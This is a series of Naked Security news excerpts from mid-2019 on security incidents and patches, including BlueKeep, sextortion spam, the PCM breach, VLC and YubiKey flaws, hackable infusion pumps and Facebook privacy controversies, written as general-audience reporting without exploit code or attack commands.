Read more at https://nakedsecurity.sophos.com/2019/07/02/medtronic-rushes-to-replace-insulin-pumps-after-flaws-found/

Relatives’ DNA in genealogy database leads to murder conviction

By Lisa Vaas

At the time that the brutalized bodies of a Canadian couple were discovered near Washington’s Mount Rainier nearly 32 years ago, police believed that the killer left his plastic gloves in plain view near their van so as to taunt investigators.

Detective Robert Gebo of the Seattle Police Department:

He leaves those behind as a sign to the police that you needn’t look for fingerprints because I wore these gloves. And he has confidence that there’s nothing that’s going to connect him with these crimes.

That killer’s self-confidence was misplaced. Decades later, he was tracked down through links to the DNA of two cousins. On Friday morning, a Snohomish County jury found William Earl Talbott II guilty on two counts of aggravated murder in the first degree for the deaths of 21-year-old Jay Cook and his 17-year-old girlfriend, Tanya Van Cuylenborg.

First DNA database conviction

This is believed to be the first murder conviction of a suspect who was identified through genealogy databases. CeCe Moore, a genetic genealogist who works for forensic company Parabon NanoLab, had used a public DNA site, GEDmatch, to help build this family tree for what would turn out to be the now-convicted murderer, based on DNA evidence from the crime scene. That tree shows the links between Talbott and two of his cousins who had uploaded their genetic profiles to GEDmatch.

Read more at https://nakedsecurity.sophos.com/2019/07/02/relatives-dna-in-geneology-database-leads-to-murder-conviction/

RDP BlueKeep exploit shows why you really, really need to patch

By Mark Stockley

About six weeks ago Microsoft took the highly unusual step of including a patch for operating systems it no longer supports in its May Patch Tuesday output.

It’s something the software juggernaut has only ever felt the need to do on a handful of occasions, so when it does happen it can be taken as a sign that something very serious indeed is going on. In this case, the something serious was CVE-2019-0708, a very serious RDP vulnerability that would soon become better known as BlueKeep.

RDP (the Remote Desktop Protocol) is what allows people to control Windows machines via a full graphical user interface, over the internet. The millions of internet-connected machines running RDP include everything from cloud-hosted servers to Windows desktops used by remote workers, and each one is a potential gateway into an organisation’s internal network.

The ‘wormable’ BlueKeep vulnerability, announced by Microsoft with the release of patches to protect against it, could theoretically be used to run attackers’ code on every one of those machines, without a username and password.

The only sliver of hope that came with May’s patches was that CVE-2019-0708 was difficult to exploit. That difficulty created a window of time for organisations to patch against BlueKeep before crooks figured out how to abuse it. There was even the outside chance that it would prove too difficult to reverse engineer.

It was a hope that didn’t last long.

Since CVE-2019-0708 became public, a small number of organisations and security researchers have credibly claimed the ability to successfully exploit it.

Read more at https://nakedsecurity.sophos.com/2019/07/01/rdp-bluekeep-exploit-shows-why-you-really-really-need-to-patch/

ETERNALBLUE sextortion scam puts your password where your name should be

By Paul Ducklin

Remember sextortion?

That’s the name for the cybercrime where crooks blast you with spam claiming to know something about your sex life or sexuality that you’d probably want to keep private if it were true…

…and then threaten to tell the world (or at least your colleagues, friends and family) all about it.

Unless you send them money right away, usually in the form of a cryptocurrency like Bitcoin, and usually within 48 hours.

It’s all a pack of lies, of course – the crooks blast out millions of these messages in the hope that the contents will be close enough to the truth that at least some victims will pay up.

Generally, the crooks say they have taken screenshots of you viewing porn, synchronized with a recording they made at the same time via your webcam.

But even if you never watch porn, or don’t have a webcam, or both, this sort of email can still be alarming because the crooks also claim to have total control of your computer, typically including:

  • Access to your passwords.
  • Access to what you type in, even if you go and change your passwords.
  • Access to your email and social media contact lists.

Also, to increase your fear, the crooks may offer “proof” that they’ve already stolen private data from you by including one or more snippets of personal information in the email.

The crooks often include your phone number or one of your passwords recovered from an existing data breach, or they pretend that they sent the email directly from your own account.

Read more at https://nakedsecurity.sophos.com/2019/07/01/eternalblue-sextortion-scam/

Cloud computing giant PCM hacked

By Danny Bradbury

A hacking group has gained access to the internal infrastructure of large cloud services provider PCM.

California-based PCM provides a mixture of solutions including cloud services and hardware, and made over $2bn in revenues in 2018. According to a report by specialist cybersecurity journalist Brian Krebs, the company discovered the breach in mid-May. Sources told him that the attackers stole administrative credentials for Office 365 accounts, and that they were mostly interested in using stolen data to conduct gift card fraud.

The modus operandi in this case was similar to other attacks on large IT providers we’ve seen, in which the hacking group sends phishing emails to companies including retailers, employee reward programs, customer loyalty and recognition businesses, and other organizations dealing in gift cards.

After compromising a system, the group would use a custom version of a malware strain called Mimikatz, which collects usernames and passwords from memory.

Once the group has access to the infrastructure of companies that deal in gift cards, it would then use money transfer services, payment processing services, and clearing houses to monetize that information. The report added:

A possible theory for targeting could be that gift cards provide access to liquid assets outside of the traditional western financial system.

Read more at https://nakedsecurity.sophos.com/2019/07/01/cloud-computing-giant-pcm-hacked/

June 27, 2019 »

Hacker threw Molotov cocktail, dropped USB drive of his DDoS deeds

By Lisa Vaas

If you’re going to go around DDoSing businesses, it’s probably not the slickest idea to carry a thumb drive full of evidence in your pocket while you’re hurling a Molotov cocktail at one of their brick-and-mortars.

A now-35-year-old Belgian man who was already sentenced to prison for hurling that bomb has had his sentence extended by 18 months because of what investigators found on a USB drive that the man dropped during or after his 2014 attack on a Crelan Bank in the town of Rumbeke, Belgium, according to Belgian news site Het Laatste Nieuws (HLN).

HLN reported last week that the USB held evidence showing that the man, identified in court documents only as Brecht S., was a member of the hacker groups that brand themselves as Anonymous Belgium and Cyber Crew.

It also implicated the man in launching a distributed denial of service attack (DDoS) against Crelan Bank that took it offline for hours, and that he extorted a pizza shop, DDoS-ing it several times until the pizzeria paid him to call off the attacks.

Investigators who searched Brecht’s devices and history reportedly found evidence that Brecht had participated in large-scale international cyber-attacks, including attacks launched against the Fédération Internationale de Football Association (FIFA), world soccer’s governing body.

FIFA has been hacked multiple times: The first time, in 2017, led to the publishing of footballers’ failed drug tests. At the time, the attack was attributed to the Russian hacking group Fancy Bear, also known as APT28.

Read more at https://nakedsecurity.sophos.com/2019/06/26/hacker-threw-molotov-cocktail-dropped-usb-drive-of-his-ddos-deeds/

Social engineering forum hacked; user data dumped on rival site

By Lisa Vaas

Social Engineered, a forum that bills itself as dedicated to the “Art of Human Hacking,” may have been given a dose of its own medicine: in mid-June, its user data was leaked and dumped on a rival forum.

On Thursday, the founder of Social Engineered, who goes by the username Snow101, confirmed the breach, blaming a MyBB vulnerability:

Mybb had a vulnerability yet again and the site got breached along other websites using Mybb. We moved over to xenforo i suggest changing your passwords immediately [sic].

MyBB is open-source, free software used to create and run online forums.

Snow101 said that Social Engineered has now moved over to the XenForo platform to try to avoid a repeat of the data breach. The forum owner is also looking for contributions: Snow101 asked members to voluntarily chip in to help in the shift from a free, open-source project to a commercial forum.

According to Bleeping Computer, whoever’s behind the leak posted that they had “uploaded the full database and root directory of this website.”

MyBB’s MyBad month

MyBB has had a shaky month. It was one of the many CMSs (content management systems) that researchers recently found weren’t storing passwords securely. They found that MyBB, along with a dozen others, was using the now obsolete MD5 hashing function.

Weak password hashing couldn’t have caused the breach at Social Engineered, but it might make the consequences of the breach much worse as hackers make light work of cracking the site’s exposed password database.

Read more at https://nakedsecurity.sophos.com/2019/06/26/social-engineering-forum-hacked-user-data-dumped-on-rival-site/

VLC media player gets biggest security update ever

By John E Dunn

Earlier this month, VideoLAN – the maintainers of the world’s most popular open source media player, VLC – issued the biggest single set of security fixes in the program’s history.

Numbering 33 in all, this included two marked critical, 21 mediums and 10 rated low, bringing VLC to 3.0.7.

But perhaps the most interesting part of the story is less the flaws themselves than the process through which they were found.

The most serious flaws

The first of the criticals, CVE-2019-12874, discovered and documented in detail by Symeon Paraschoudis of Pen Test Partners, is an out-of-bounds write flaw in the FAAD2 MPEG-4 and MPEG-2 AAC decoder library used by VLC 3.0.6 and earlier.

The second is CVE-2019-5439, a stack buffer overflow in version 4.0.0 beta’s Reliable Internet Stream Transport (RIST), potentially allowing remote code execution (RCE) at the user’s privilege level, if the user can be persuaded to run a malicious AVI or MKV video file.

The mediums, meanwhile, are described by VideoLAN’s Jean-Baptiste Kempf as “mostly out-of-band reads, heap overflows, NULL-dereference and use-after-free security issues,” which could crash VLC.

Read more at https://nakedsecurity.sophos.com/2019/06/26/vlc-media-player-gets-biggest-security-update-ever/

Google creates educational tools to help kids spot fake news

By Danny Bradbury

Google is on a mission to teach kids how to spot fake news. The company has expanded its internet safety guide for children with techniques and games to help them be more information literate online.

The expansion is part of its Be Internet Awesome (Be Internet Legends in the UK) initiative, aimed at families, educators, and children to help young people be better online citizens and protect themselves.

The initiative, which aligns with educational standards from the International Society for Technology in Education (ISTE) and the American Association of School Librarians (AASL), features an ‘Internet Code of Awesome’ supported by lesson plans that include ‘Share with Care’, ‘Secure your Secrets’, ‘It’s Cool to be Kind’, and ‘When in Doubt, Talk It Out’.

Don’t Fall for Fake

The new activities are listed under another item in the Code: ‘Don’t Fall for Fake’. Google developed them in conjunction with Anne Collier, executive director of The Net Safety Collaborative, and Faith Rogow, PhD, co-author of The Teacher’s Guide to Media Literacy and a co-founder of the National Association for Media Literacy Education.

Read more at https://nakedsecurity.sophos.com/2019/06/26/google-launches-educational-tools-to-help-kids-spot-fake-news/

Serious Security: Rambleed attacks blunted – the OpenSSH way

By Paul Ducklin

We all know that you’re not supposed to save raw passwords to disk these days.

The reason is obvious: disk storage is generally supposed to be both permanent and shared.

Once you’ve written something to disk unencrypted, there’s always a chance that someone else might be able to get it back later, especially if they know it’s there and it’s worth looking for.

At worst, they could shut down the computer your program is running on, remove the disk (or desolder the chips that make up a solid-state storage device) and try to extract the data elsewhere at their leisure.

As we like to say at Naked Security, Dance like no one’s watching. Encrypt like everyone is.

Of course, blunders happen – even companies that pride themselves on being leaders in secure coding practices have recently admitted to saving plaintext passwords by mistake.

Facebook let plaintext passwords escape into logfiles for about seven years before noticing the error; rivals Google made a similar mistake in a sysadmin toolkit for an astonishing 14 years, admitting in May 2019 that “we made an error when implementing this functionality back in 2005.”

Read more at https://nakedsecurity.sophos.com/2019/06/25/serious-security-rambleed-attacks-blunted-the-openssh-way/

WeTransfer sends user file links to wrong people

By Danny Bradbury

Popular file transfer service WeTransfer faces embarrassment this week after admitting that it has mailed file links to the wrong users.

Founded in 2009, WeTransfer enables users to transfer large files between each other for free. It’s an alternative to email services, which typically place limitations on file size. It has 50 million users sending a billion files each month, amounting to a Petabyte (1,000 Terabytes) of data.

The service, which became profitable in 2013, provides its free version through an advertising model. It also offers a paid ‘Plus’ service that lets users password protect their files.

On 21 June 2019 WeTransfer posted a security notice warning of an incident it had discovered five days earlier on Monday 17 June 2019.

The issue began on 16 June 2019, the notice said, adding:

e-mails supporting our services were sent to unintended e-mail addresses. We are currently informing potentially affected users and have informed the relevant authorities.

WeTransfer had blocked the links and logged users out of their accounts, it said.

Read more at https://nakedsecurity.sophos.com/2019/06/25/wetransfer-sends-user-file-links-to-wrong-people/

Presidential text alerts are open to spoofing attacks, warn researchers

By John E Dunn

Researchers have shown that it’s technically possible for hackers to target the US presidential alerts system to send fake messages on a localized basis.

For anyone who can’t remember what these are, the Federal Emergency Management Agency (FEMA), which manages the system, sent a message to 200 million US mobile users designed to test the Wireless Emergency Alerts (WEA) system at 2:18 pm (ET) on 3 October 2018. It read:

Presidential Alert. THIS IS A TEST of the National Wireless Emergency Alert System. No action is needed.

Judging from Twitter responses and a legal challenge, not all Americans were pleased at the idea of being sent a text message of up to 90 characters by the US President that they can’t opt out of or block, but it did achieve its purpose of publicizing an unfamiliar element of the system.

The Integrated Public Alert and Warning System (IPAWS), launched in 2006, in fact carries three types of alert, the other two being Imminent Threat Alerts (usually weather or fire-related) and Amber Alerts, used to tell people about missing or abducted children.

Emergency alerts also have the potential to go badly wrong, as millions of Hawaii residents discovered on 13 January 2018, when they received the following terrifying message at 8:07 am:

Emergency alert. Ballistic missile inbound to Hawaii. Seek immediate shelter. This is not a drill.

As people crawled under café tables in fear, it took 38 minutes for the authorities to confirm that the message was a false alarm caused by human error.

Read more at https://nakedsecurity.sophos.com/2019/06/25/presidential-text-alerts-are-open-to-spoofing-attacks-warn-researchers/

June 18, 2019 »

90% off Ray-Bans? It’s a 100% Instagram SCAM!

By Lisa Vaas

A scam ad for Ray-Ban sunglasses has been making the rounds on Instagram.

There are many versions, but they tend to feature the Ray-Ban logo and photos of sunglasses, along with the “whoa, what a crazy deal!” offers of “90% off”. We’ve seen one that dangles the cheap-cheap price tag of £17.65 (that’s US $22.13 – for glasses that typically go for over $100).

And of course, you better hurry, since this offer won’t last – it’s one day only! … And has been for a few weeks!

Not everybody is going to see the fake ads and write them off as being the scams that they are, unfortunately. After all, the ads bear the name of a (self-proclaimed) “official” website. Plus, you’ve likely seen these ads being posted by your Instagram friends.

Don’t fall for it, though. It seems too good to be true, which means it is.

Read more at https://nakedsecurity.sophos.com/2019/06/18/90-off-ray-bans-its-a-100-instagram-scam/

Bella Thorne steals hacker’s thunder, publishes nude photos herself

By Lisa Vaas

The forces of extortionist scumbaggery have had the rug pulled out from them yet again: last week, it was Radiohead, releasing 18 hours of music rather than pay up to whoever hacked it away.

This week, it’s American actress Bella Thorne. Her approach: Oh, so you’re threatening to publish nude pics you hacked out of my accounts? Too late – I did it myself.

Thorne posted the images to Twitter on Saturday. She said in the tweet, which included screenshots of text messages with the alleged hacker, that “all of her s**t” got hacked on Friday. Then, she had to put up with 24 hours of threats “with my own nudes.”

I feel gross. I feel watched, I feel someone has taken something from me that I only wanted one special person to see.

Oh, and by the way, the FBI will be at your door shortly, she also said.

By Sunday, Thorne was still angry and hurt, but feeling a bit more compassionate toward whatever nimrod tried to blackmail her. In an interview with Hollywood Reporter, she said that she thinks whoever hacked her is a kid – somebody who made a bad choice and shouldn’t have his life ruined because of it:

This kid sounds like he’s 17, as much as I’m so angry and wanted to [f**k] him up over doing this to people I just wanted to teach him a lesson, He’s still a kid and we make mistakes, this mistake is a bad one. But I don’t want some 17-year-old’s whole life ruined because he wasn’t thinking straight and [was] being a dumbass.

“If she hadn’t taken them in the first place…”

Read more at https://nakedsecurity.sophos.com/2019/06/18/bella-thorne-steals-hackers-thunder-publishes-nude-photos-herself/

The US is reportedly seeding Russia’s power grid with malware

By Danny Bradbury

The US has been quietly planting malware throughout Russia’s energy networks in response to years of Russian attacks on its own power grid, the New York Times reported on Saturday.

Quoting officials interviewed over the last three months, the paper said that the latest moves represent a turning point for the US policy on interfering with Russia’s electricity infrastructure. Under the Obama administration, the US had used reconnaissance tools to monitor Russia’s electricity control systems. The Trump administration has escalated this activity to an offensive campaign, placing software that could destabilize electrical services within Russia.

The move follows years of provocation by Russia, which has reportedly run recurring cybercampaigns targeting the US energy grid.

In March 2019, the Department of Homeland Security (DHS) reported that Russian hackers had been targeting US infrastructure including not just energy and nuclear facilities, but also water, aviation, and critical manufacturing sectors. The hackers would infiltrate the targets’ trusted partner organizations and use them as staging grounds for their attacks, the report warned.

That report updated a similar warning in October 2017, although that one did not single Russia out for blame.

Most recently, security firm Dragos alleged that Xenotime, a hacking group thought to be linked to Moscow, has been using its Triton (also known as Trisis) malware to explore US power networks in possible preparation for a future attack. It identified…

… a persistent pattern of activity attempting to gather information and enumerate network resources associated with US and Asia-Pacific electric utilities.

This behavior could indicate the activity group was preparing for a further cyberattack, or at minimum satisfying the prerequisites for a future ICS-focused intrusion.

Read more at https://nakedsecurity.sophos.com/2019/06/18/the-us-is-reportedly-seeding-russias-power-grid-with-malware/

Phishing attack lures victims with encrypted message alert

By John E Dunn

What is it about phishing emails that makes them so enduringly popular with the bad guys?

The standard answer is they exploit fear, alarm and annoyance to persuade users to click on them, which explains the horde of campaigns using fictitious legal threats or warnings about bank accounts to get a foot in the door.

However, a new campaign covered by Bleeping Computer reminds us that there is another psychological impulse that works just as well if skillfully deployed – curiosity.

This one is couched as an email, apparently from Microsoft, alerting the recipient to an encrypted message which must be viewed by accessing OneDrive for Business.

It used to be said that the best phishing attacks gamed their victims in the shortest possible time and the fewest steps, but that was before cloud services were invented; now, arguably, introducing more steps aids authenticity.

This one has several, including a faked-up OneDrive-branded email with a blue ‘Open’ button plastered in the middle of it, followed by – of course – a pretend OneDrive login page that asks users to enter their account credentials to download the file.

It’s like being asked to follow a trail of sweets to find out what’s at the end only to discover it’s a pit filled with spikes.

A big giveaway is that Microsoft business accounts should be protected by two-factor authentication (2FA), which this fake login lacks, but it’s possible some users won’t notice its absence if they’re not familiar with it.

Read more at https://nakedsecurity.sophos.com/2019/06/18/phishing-attack-lures-victims-with-encrypted-message-alert/

June 17, 2019 »

Yubico recalls FIPS Yubikey tokens after flaw found

By John E Dunn

Security token maker Yubico has issued an important advisory affecting high-end versions of its YubiKey authentication key, arguably the most significant vulnerability discovered in this class of product to date.

Yubico describes the bug in its FIPS series as being:

Where the first set of random values used by YubiKey FIPS applications after each device power-up have reduced randomness … for the first operations performed after YubiKey FIPS power-up. The buffer holding random values contains some predictable content left over from the FIPS power-up self-tests which could affect cryptographic operations which require random data until the predictable content is exhausted.

In other words, for the first operation after power-up at least, the cryptographic material produced by the key isn’t as random as it should be for secure encryption, creating a hypothetical short-term weakness that is only ironed out when that data has been consumed.

This affects cryptographic algorithms to different extents. For RSA it’s a modest 80 bits out of a minimum of 2,048, while for ECDSA it’s more like 80 bits out of 256, which could:

Allow an attacker who gains access to several signatures to reconstruct the private key.

These differences mean that the weakness is worse in some products than in others, for example the PIV Smart Card and OpenPGP implementations (which use RSA) compared to the FIPS FIDO U2F keys (whose authentication depends on ECDSA).

FIPS with everything

The weakness exists only in the YubiKey FIPS, YubiKey Nano FIPS, YubiKey C FIPS, and YubiKey C Nano FIPS, that is, products that have the ‘FIPS’ prefix printed on them. Consumer and most business YubiKeys are not affected.

Read more at https://nakedsecurity.sophos.com/2019/06/17/yubico-recalls-fips-yubikey-tokens-after-flaw-found/

Privacy foul for soccer league app that eavesdropped on users

By Danny Bradbury

A privacy violation case this month has illustrated the dangers of giving apps access to your smartphone sensors. Spain’s data protection agency is reportedly fining Spanish football league LaLiga €250,000 (around $280,000) for co-opting users’ smartphones as digital eavesdropping tools.

The organization’s app, available on both the Android and iOS platforms, provides users with soccer commentary, news, and data. Unbeknownst to those who didn’t read the fine print, it also used their GPS functions to determine where they were during football matches.

The app would then use their smartphones’ microphones to record ambient noise and see if it matched game noise. If the app found a match, and discovered that you were in a public place like a bar, it could deduce that the game was being broadcast illegally.

This approach is similar to the Shazam app’s technique of matching ambient noise with known songs to tell you what music your coffee shop is playing. The difference is that this is Shazam’s primary and publicized purpose. LaLiga’s app was doing its matching unobtrusively in the background while it provided users with another service.

Read more at https://nakedsecurity.sophos.com/2019/06/17/privacy-foul-for-soccer-league-app-that-eavesdropped-on-users/

I’d like to add you to my professional network of people to spy on

By Lisa Vaas

We’re sorry to inform you that if you were looking for some insight into Russian and Eurasian politics in the Washington political scene, or if you were sniffing around for a job with, say, the Brookings Institution, you won’t have 30-year-old Katie Jones to cozy up to anymore.

She’s disappeared off of LinkedIn. Actually, “she” – as in, a corporeal being, as opposed to a deepfake created by artificial intelligence (AI) – was never there to begin with, according to an investigation by the Associated Press.

This is what her LinkedIn profile looked like before Katie Jones, an extremely well-connected redhead and purportedly a Russia and Eurasia Fellow at the top think-tank Center for Strategic and International Studies (CSIS), blinked out of existence.

AP reporter Raphael Satter says that the profile was removed from LinkedIn about 36 hours after he contacted the networking platform about it.

Most people, upon seeing a connection request from such a highly placed and accomplished young woman, would likely accept. After all, there’s a strong element of self-promotion with LinkedIn networking, as pointed out by many of the 40 or so people whom the Jones profile managed to connect with and whom Satter interviewed.

Read more at https://nakedsecurity.sophos.com/2019/06/17/id-like-to-add-you-to-my-professional-network-of-people-to-spy-on/

Widely used medical infusion pump can be remotely hijacked

By Lisa Vaas

Researchers have found two security vulnerabilities, one severe, in Becton Dickinson (BD) infusion pumps: the devices used in hospitals for supplying power and network connectivity to multiple infusion and syringe pumps that deliver fluids, including intravenous fluids, painkillers and medications such as insulin.

Such pumps are often hooked up to a central monitoring station so that hospital staff can check on multiple patients at the same time.

The flaws, in BD’s Alaris Gateway Workstation (AGW), were discovered by the healthcare cybersecurity firm CyberMDX in September 2018. The firm’s researchers said on Thursday that one of the security flaws – the most critical, according to an advisory issued by the Department of Homeland Security (DHS), also on Thursday – could allow the devices to be remotely hijacked and controlled.

The researchers said that the exploit could be carried out by…

… anyone who gains access to the hospital’s internal network. Files transferred via the update are copied straight to the internal memory and allowed to override existing files.

The vulnerable part of the pumps is the firmware in the onboard computer, which powers, monitors and controls the infusion pumps. The pumps run on Windows CE, which is Microsoft’s operating system for embedded devices and devices with minimal memory. That operating system later came to be known as Windows Embedded Compact.

Read more at https://nakedsecurity.sophos.com/2019/06/17/widely-used-medical-infusion-pump-can-be-remotely-hijacked/

Android phones can now be security keys for iOS devices

By Danny Bradbury

Hey, iOS users. Got a spare Android phone lying around? Now, you can use it as a secure access key for online services.

In April, Google announced that it was turning its Android phones into security keys. These software-based keys implement the FIDO2 standard, developed by the FIDO Alliance and the W3C (as WebAuthn) to make phishing-resistant logins easier.

Instead of proving who you are with a password, you prove possession of a private key held by a piece of suitable hardware. Google and other vendors sell small dongles that connect via a computer’s USB port or via Bluetooth. The website sends a random challenge, the device signs it with a private key that never leaves the device, and your browser relays the signature back to the site as proof that you’re legit.

Storing that key on an Android phone makes the phone itself the security device: you must be in physical control of the phone, and confirm on it, to log in to a site on your computer. Over Bluetooth, the phone can authenticate you when you log into Google services from a nearby computer, and now from an iOS device too.

These phone-based keys also defeat phishing sites, including ones that proxy the real login page (a man-in-the-middle attack). The credential is bound to the website’s origin: the browser writes the page’s actual origin into the data the phone signs, and the phone only releases the credential registered for that site, so a look-alike (phishy) URL cannot obtain a valid response.

Read more at https://nakedsecurity.sophos.com/2019/06/14/android-phones-can-now-be-security-keys-for-ios-devices/

Facebook got 187,000 users’ data with snoopy VPN app

By Lisa Vaas

In January, Apple’s App Store gave the heave-ho to Facebook’s snoopy Research VPN (virtual private network) app.

Now we know how many users Facebook Research got personal and sensitive device data from: 187,000, according to a letter sent by Facebook to Senator Richard Blumenthal and obtained by TechCrunch. That’s 31,000 US users, 4,300 of whom were teenagers, with the rest from India.

The now-defunct Research app had what security researcher Will Strafach called “nearly limitless access” to the device. That includes web browsing histories, encrypted messages and mobile app activity of not just the volunteer users but also, potentially, data from their friends.

It was kicked from the App Store for violating Apple’s Developer Enterprise Program License Agreement by installing a root certificate, which let Facebook inspect the device’s encrypted traffic. Enterprise distribution is supposed to be limited to apps “for use by your employees”.

Facebook pushed back at the negative coverage it received following the eviction, pointing out that it wasn’t the snoopiness of the app that saw it discarded, and that users were well aware they were being snooped on:

…there was nothing ‘secret’ about this; it was literally called the Facebook Research App. It wasn’t ‘spying’ as all of the people who signed up to participate went through a clear on-boarding process asking for their permission and were paid to participate.

The data was used for competitive analysis. Facebook used an earlier VPN app, Onavo, to track its competition and scope out new product categories. Private, internal emails from Facebook staff that were published in December 2018 revealed that Facebook had relied on Onavo data when it decided to purchase WhatsApp, for example. The company also used the Onavo data to track usage of its rivals and to block some of them, including Vine, Ticketmaster and Airbiquity, from accessing its friends data firehose API.

Read more at https://nakedsecurity.sophos.com/2019/06/14/facebook-got-187000-users-data-with-snoopy-vpn-app/

Facebook keeps deepfake of Mark Zuckerberg

By Lisa Vaas

After a fake video of House Speaker Nancy Pelosi depicting her drunkenly slurring her words went viral last month, Facebook said nope, we’re not taking it down.

We’ve flagged it as fake, Facebook said, we’ve de-prioritized it so it doesn’t show up (all that much) in users’ feeds, and we’ve slapped third-party fact-checker information next to it.

Facebook VP for Product Policy and Counterterrorism Monika Bickert, from a grilling by CNN’s Anderson Cooper:

We think it’s important for people to make their own, informed choice about what to believe. Our job is to make sure we are getting them accurate information. And that’s why we work with more than 50 fact-checking organizations around the world.

Oh, reeeeeally?

Well, Facebook’s bluff has been called. Facebook, meet your CEO’s evil deepfake twin, the Zucker-borg who implies that he’s in total control of billions of people’s stolen data and ready to control the future. To rub a bit of salt into the wound, it was distributed on Facebook’s own Instagram platform, and it was gussied up with official CBS trademarking so it looked like a bona fide interview.

Read more at https://nakedsecurity.sophos.com/2019/06/13/facebook-keeps-deepfake-of-mark-zuckerberg/

Critical Adobe Flash player bug and more in June’s Patch Tuesday

By Danny Bradbury

The June Patch Tuesday is out, featuring 88 CVE-level fixes, including 21 rated critical. Adobe, meanwhile, fixed several critical vulnerabilities, including a flaw in Adobe Flash Player rated critical because it can be exploited remotely.

Adobe published a patch for a Flash Player bug (CVE-2019-7845), affecting versions 32.0.0.192 and earlier, that lets an attacker exploit the program through a malicious website or an ActiveX control. A successful attacker could run their own code remotely as the current user. The bug affects the Flash Player desktop runtime on Windows, macOS and Linux, along with the Flash Player plugins for Google Chrome, Microsoft Edge and IE 11.

Also out from Adobe on Tuesday was a fix for critical vulnerabilities in its ColdFusion rapid web application development product. CVE-2019-7838 enables an attacker to bypass a file extension blacklist when uploading a file, while CVE-2019-7839 is an unspecified command injection vulnerability. The third, CVE-2019-7840, allows deserialization of untrusted data (deserialization reconstructs objects from a transport format; when the input is attacker-controlled, the reconstructed objects can be made to trigger code execution).

Finally, Adobe patched a critical vulnerability in its Campaign product for marketing professionals which could allow for remote code execution via a command injection flaw. It fixed this vulnerability (CVE-2019-7850) along with several other flaws rated either moderate or important.

Microsoft Edge

Microsoft’s other critical bug this month was in the scripting engine underpinning Microsoft Edge. This is the program that processes scripting languages like JavaScript. The engine doesn’t handle objects properly when running scripts in the Edge browser, meaning that a malicious website could cause it to spill its memory contents.

Read more at https://nakedsecurity.sophos.com/2019/06/12/june-patch-tuesday-sees-critical-adobe-flash-player-bug-fix/
